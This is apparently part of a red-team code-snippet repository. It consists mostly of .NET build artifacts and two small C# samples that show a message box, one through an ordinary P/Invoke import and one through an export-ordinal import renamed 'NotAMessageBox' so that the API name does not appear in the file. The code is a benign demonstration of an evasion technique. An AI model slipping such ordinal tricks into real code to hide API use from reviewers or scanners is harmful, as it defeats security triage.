38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- 
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- 
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke_Syscalls\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | 
-------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | b31ed79f3e4190b809f1aa8db22f513b40fba58a 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": 
"idqgkXj4YR79iFvMjG/5hb5UhChBxPT5UUcFWEq/bFVUqYDfRbpnPsOPfseDkfNQniGO0Ynq1BYiK5kkuK29aA==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke_Syscalls\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- 
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | 
"name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = 
C:\Users\0xtriboulet\Documents\cs-progs\HookBypass\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | ee34b10399e914a8aedc3d5bcc7c2cad3704dcb8 2 | -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "Qa6dvrVwNTxdRmvSiTGiddzLTnQou+7/9KlhkWeN3bCzmLieRFrfYHHUPK9NFcoZBQzQag36RTDJtgYLvXGWOg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\HookBypass\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- 
/C#/HookBypass/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Ordinal/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace Ordinals
{
    // Demonstrates a P/Invoke import that is bound by export ordinal instead of by name.
    //
    // How the ordinal was found (author's steps): PEview -> SECTION .text ->
    // EXPORT Address Table -> MessageBoxW, which showed ordinal 0x0874 (decimal 2164)
    // in the inspected copy of user32.dll.
    //
    // NOTE(review): export ordinals of user32.dll are not a stable contract and can
    // differ between Windows builds. Where #2164 is absent the call throws
    // EntryPointNotFoundException; where it maps to another export, that function is
    // invoked with this signature instead.
    //
    // Analysis note: because of EntryPoint = "#2164", the import declared here names
    // only the DLL and the ordinal, and the managed method is called NotAMessageBox,
    // so the string "MessageBoxW" does not appear in this file. Triage that matches
    // on imported API names will miss the call; resolve the ordinal against the
    // export table of the user32.dll build in question.
    internal class Program
    {
        // Import of user32.dll export #2164; both string parameters are marshalled as Unicode.
        [DllImport("user32.dll", CharSet = CharSet.Unicode, EntryPoint = "#2164")]
        private static extern int NotAMessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);

        // Entry point: makes one call through the ordinal import. No owner window,
        // type flags 0; the int result is discarded and args is not read.
        private static void Main(string[] args)
        {
            const uint typeFlags = 0;
            _ = NotAMessageBox(hWnd: IntPtr.Zero, lpText: "Ordinal!!", lpCaption: "Ordinal", uType: typeFlags);
        }
    }
}
-------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "message_box_ordinal/1.0.0": { 10 | "runtime": { 11 | "message_box_ordinal.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "message_box_ordinal/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- 
/C#/Ordinal/message_box_ordinal/message_box_ordinal.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 812328a406d511f0cb86ca1de9b6c979e8ce68f5 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = message_box_ordinal 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\message_box_ordinal\message_box_ordinal\ 4 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache -------------------------------------------------------------------------------- 
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 94ce58349191cbc449fdb3720ceffeb425f4bcfd 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 46fa7d9c7209793a53c6eecb31254525cde9465c 2 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/message_box_ordinal.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/Ordinal/message_box_ordinal/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": 
"n5d2sI7PqLshZtvMBRBPM2qNVlUVNYYAUTAH+ZMLHmHyoGv2yIjUZjDc77tEFY16/f0OCJ+2eQ8tm1h8ABO9rQ==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\message_box_ordinal\\message_box_ordinal\\message_box_ordinal.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/PInvoke.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace PInvoke
{
    // Minimal P/Invoke sample: declares MessageBoxW from user32.dll and calls it once.
    //
    // No EntryPoint is set on the attribute, so the import is declared under the
    // method's own name; the DLL name and "MessageBoxW" are both visible in this
    // declaration, which is what import-name based review of an assembly keys on.
    internal class Program
    {
        // Import of user32.dll!MessageBoxW; both string parameters are marshalled as Unicode.
        [DllImport("user32.dll", CharSet = CharSet.Unicode)]
        private static extern int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType);

        // Entry point: shows a single dialog with no owner window and type flags 0.
        // The int result of the call is discarded and args is not read.
        private static void Main(string[] args)
        {
            const uint typeFlags = 0;
            _ = MessageBoxW(hWnd: IntPtr.Zero, lpText: "My first P/Invoke", lpCaption: "Hello World!", uType: typeFlags);
        }
    }
}
-------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "PInvoke/1.0.0": { 10 | "runtime": { 11 | "PInvoke.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "PInvoke/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.AssemblyInfoInputs.cache: 
-------------------------------------------------------------------------------- 1 | 9e757931411dfb9bdddde4d3b5e0787e30c22b30 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = PInvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\PInvoke\PInvoke\ 4 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | fc9c814ed963a5f84495ebe65f08a3299e1d96f2 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll: -------------------------------------------------------------------------------- 